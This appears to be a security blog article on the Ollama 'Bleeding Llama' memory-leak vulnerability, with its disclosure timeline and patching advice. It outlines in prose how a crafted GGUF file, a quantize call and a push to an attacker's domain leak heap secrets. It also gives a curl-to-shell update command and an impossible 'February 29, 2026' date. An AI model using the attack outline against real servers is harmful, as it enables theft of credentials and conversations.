Bleeding Llama (CVE-2026-7482): Critical Ollama Vulnerability Leaks Your Entire Server Memory
What Is Bleeding Llama?
If you run Ollama — the most popular open-source platform for running large language models locally — your server may be silently leaking everything in its memory to anyone who knows how to ask.
A critical vulnerability tracked as CVE-2026-7482 and nicknamed "Bleeding Llama" by cybersecurity firm Cyera allows unauthenticated attackers to extract the entire process memory of an Ollama server. API keys, system prompts, user conversations, environment variables, database credentials — all of it. The attack requires just three HTTP API calls and produces zero errors, zero crashes, and zero log entries.
With a CVSS severity score of 9.1, Bleeding Llama ranks among the most dangerous vulnerabilities discovered in AI infrastructure in 2026. Roughly 300,000 Ollama servers are exposed on the public internet right now, and many operators still don't know they're vulnerable.
Who Found It
The vulnerability was discovered by Dor Attias, a security researcher at Cyera. Cyera is a data security company focused on AI and cloud infrastructure. Attias reported the vulnerability to Ollama on February 2, 2026, and spent nearly three months navigating a difficult disclosure process before the CVE was finally assigned.
How Ollama Normally Works
To understand the vulnerability, you need to know how Ollama handles model files. Ollama uses a file format called GGUF (GPT-Generated Unified Format) to store AI models. A GGUF file contains tensors — large arrays of numerical data that make up the model's weights — along with metadata that describes the size and shape of each tensor.
When you create a model in Ollama, there are two main paths. You can pull a model from the Ollama registry using /api/pull, or you can upload your own GGUF file and create a model from it using /api/create. The second path is where the vulnerability lives.
During model creation, if quantization is needed (converting tensor data between formats like F32 and F16), Ollama reads each tensor from the file based on the declared size in the GGUF metadata — not the actual file size. The critical function is WriteTo() in fs/ggml/gguf.go and server/quantization.go, which uses Go's unsafe package to bypass memory safety guarantees.
How the Attack Works
The attack is a three-step process that exploits the gap between what a GGUF file claims to contain and what it actually contains.
Step 1: Upload the Crafted GGUF File
The attacker creates a tiny GGUF file — perhaps just a few kilobytes. But inside the file's metadata, the tensor shape is declared as something enormous — say, 1 million elements. The attacker uploads this file to the target Ollama server via /api/blobs/sha256:<digest>. This is a simple HTTP PUT request. No authentication is required — Ollama's API endpoints ship with zero auth in the upstream distribution.
Step 2: Trigger the Memory Bleed
The attacker calls /api/create with the quantize parameter set, referencing the uploaded blob. Ollama parses the GGUF file, sees the declared tensor shape of 1 million elements, and begins reading that many elements from memory during quantization. The actual file data ends after a few kilobytes, but Ollama keeps reading — straight into heap memory.
The heap is where Ollama stores everything during runtime: environment variables containing API keys and cloud credentials, system prompts you've configured, user conversations happening concurrently, any secrets loaded from .env files or passed as environment variables. All of this data gets read into the output buffer and baked into the resulting "model" artifact.
Step 3: Exfiltrate Everything
The attacker sets the model name to a domain they control. Then they call /api/push — Ollama's built-in model push feature — which sends the newly created "model" (now containing leaked heap data embedded in its tensor weights) to the attacker's server. By reversing the quantization on their end, the attacker can read the raw heap data in plaintext.
Three API calls. No authentication at any step. No crash. No error log. Completely silent.
What Gets Leaked
The leaked heap memory can contain anything that the Ollama process has touched:
- API keys — OpenAI, Anthropic, cloud provider keys stored in environment variables
- Database credentials — connection strings, passwords
- System prompts — proprietary instructions you've configured for your models
- User conversations — prompts and responses from concurrent users
- Cloud secrets — AWS, GCP, Azure credentials passed as env vars
- Code and data — anything being processed by inference jobs
As Cyera's Dor Attias put it: "Through AI inference, an attacker can learn basically everything about an organization: API keys, proprietary code, customer contracts, and more."
Why "Localhost" Doesn't Save You
The default Ollama configuration binds to 127.0.0.1, which means only the local machine can access it. But in practice, many real-world deployments are exposed:
- OLLAMA_HOST=0.0.0.0 — A very common configuration for accessing Ollama from another device on the network. Without a firewall, this exposes the API to the entire internet.
- Docker port binding — Running Ollama with
-p 11434:11434defaults to0.0.0.0, silently exposing the API beyond localhost. - Cloudflare Tunnel / ngrok — If you expose Ollama through a tunnel without authentication policies, anyone with the URL can hit the API directly.
- Same-network attacks — On shared WiFi (offices, co-working spaces), anyone on the same network can reach an Ollama instance bound to
0.0.0.0. - Browser-based SSRF — Even on localhost, a malicious website's JavaScript can make requests to
127.0.0.1:11434since Ollama has no CORS protection.
Scans have found approximately 300,000 internet-facing Ollama deployments — these are real configurations real people use every day.
The Disclosure Mess
The timeline of this vulnerability's disclosure reveals systemic problems in how AI infrastructure security gets handled.
- February 2, 2026 — Dor Attias at Cyera reports the vulnerability to Ollama.
- February 13, 2026 — Researcher follows up requesting acknowledgement.
- February 25, 2026 — Ollama acknowledges the vulnerability and shares a fix via a PR. The researcher confirms the fix is valid.
- February 25, 2026 — Ollama asks the researcher to submit the CVE independently, rather than handling it themselves.
- February 26, 2026 — The researcher warns Ollama that releasing a fix without explicitly flagging it as a security patch will leave operators unaware of the urgency. Proposes GitHub Security Advisories as a faster alternative.
- February 29, 2026 — Researcher follows up requesting a status update. No response.
- March 2, 2026 — CVE request submitted to MITRE. No response.
- March 26, 2026 — Follow-up sent to MITRE. Still no response.
- April 26, 2026 — With no resolution from MITRE, the researcher approaches Echo, a third-party CVE Numbering Authority.
- April 28, 2026 — Echo assigns CVE-2026-7482 and reports Ollama for visibility.
- May 1, 2026 — CVE is published.
The patch shipped in Ollama v0.17.1 on February 25, but the release notes never flagged it as a security fix. For nearly three months, the fix existed but operators had no CVE, no scanner alert, and no release note telling them to urgently update. Without a CVE number, the vulnerability was invisible to every patch management tool and security scanner in the industry.
This is a pattern: open-source AI projects shipping silent security fixes, leaving the security communication burden on the researcher who found the problem.
Bonus: Two More Unpatched Ollama Vulnerabilities
As if Bleeding Llama wasn't enough, researchers at Striga separately disclosed two additional vulnerabilities in Ollama's Windows auto-update mechanism — CVE-2026-42248 (missing signature verification, CVSS 7.7) and CVE-2026-42249 (path traversal in the update process, CVSS 7.7). When chained together, these allow an attacker to achieve persistent code execution on victim machines at every login. Both remain unpatched as of May 2026, despite the 90-day responsible disclosure period having expired.
How to Check If You're Vulnerable
Open your terminal and run:
ollama --version
If the output shows 0.17.1 or higher, you're patched for Bleeding Llama. Anything below that means you're vulnerable — update immediately.
Update Commands
- macOS (Homebrew):
brew upgrade ollama - Linux:
curl -fsSL https://ollama.com/install.sh | sh - Docker:
docker pull ollama/ollama
How to Protect Yourself
- Update to v0.17.1 or later — This is non-negotiable. Do it now.
- Check your OLLAMA_HOST setting — If it's set to
0.0.0.0, ask yourself why. If you don't need remote access, set it back to127.0.0.1. - Add an authentication proxy — If you need remote access, put Nginx, Caddy, or another reverse proxy in front with authentication. Ollama's REST API has zero built-in auth.
- Set up access policies — If you use Cloudflare Tunnel, configure Access policies with zero trust. If you use ngrok, enable basic auth at minimum.
- Rotate compromised secrets — If your Ollama instance was exposed before patching, assume your secrets are compromised. Rotate all API keys, tokens, and credentials that were in your environment variables.
- Treat Ollama like a database — You would never put a database on the public internet without authentication. Apply the same principle to your AI inference server.
- Audit network exposure — Run a quick scan to check if any of your Ollama instances are reachable from the internet. Tools like runZero can help identify exposed assets.
The Bigger Picture
Bleeding Llama is not an isolated incident. It's part of a growing pattern: AI infrastructure tools built for developer convenience with security as an afterthought. Ollama has 170,000+ GitHub stars and 100 million Docker Hub downloads. It has become critical infrastructure for thousands of organizations running local AI inference. But its API ships with no authentication, its GGUF parser trusted attacker-controlled metadata without bounds checking, and its security patch was released silently without any advisory.
As local LLM adoption continues to accelerate, every operator running self-hosted inference needs to treat these platforms with the same security discipline they'd apply to any production database or API gateway. The convenience of ollama run llama3 shouldn't mean accepting that your API keys are one crafted file away from exfiltration.
References
Related articles
Microsoft Edge Keeps Every Saved Password in Cleartext Memory — And Microsoft Says It's "By Design"
Microsoft Edge decrypts your entire password vault into plaintext process memory at startup. A researcher proved it, Microsoft called it by design.
CVE-2026-31431 (Copy Fail): 9-Year-Old Linux Kernel Flaw Gives Root on Every Major Distro
Copy Fail (CVE-2026-31431) is a critical Linux kernel privilege escalation flaw hiding since 2017. Learn how it works, which distros are affected, and…
Critical cPanel Authentication Bypass (CVE-2026-41940): What You Need to Know
A critical CVSS 9.8 authentication bypass in cPanel & WHM has been exploited as a zero-day since February 2026. Learn the impact, how it works, and ho…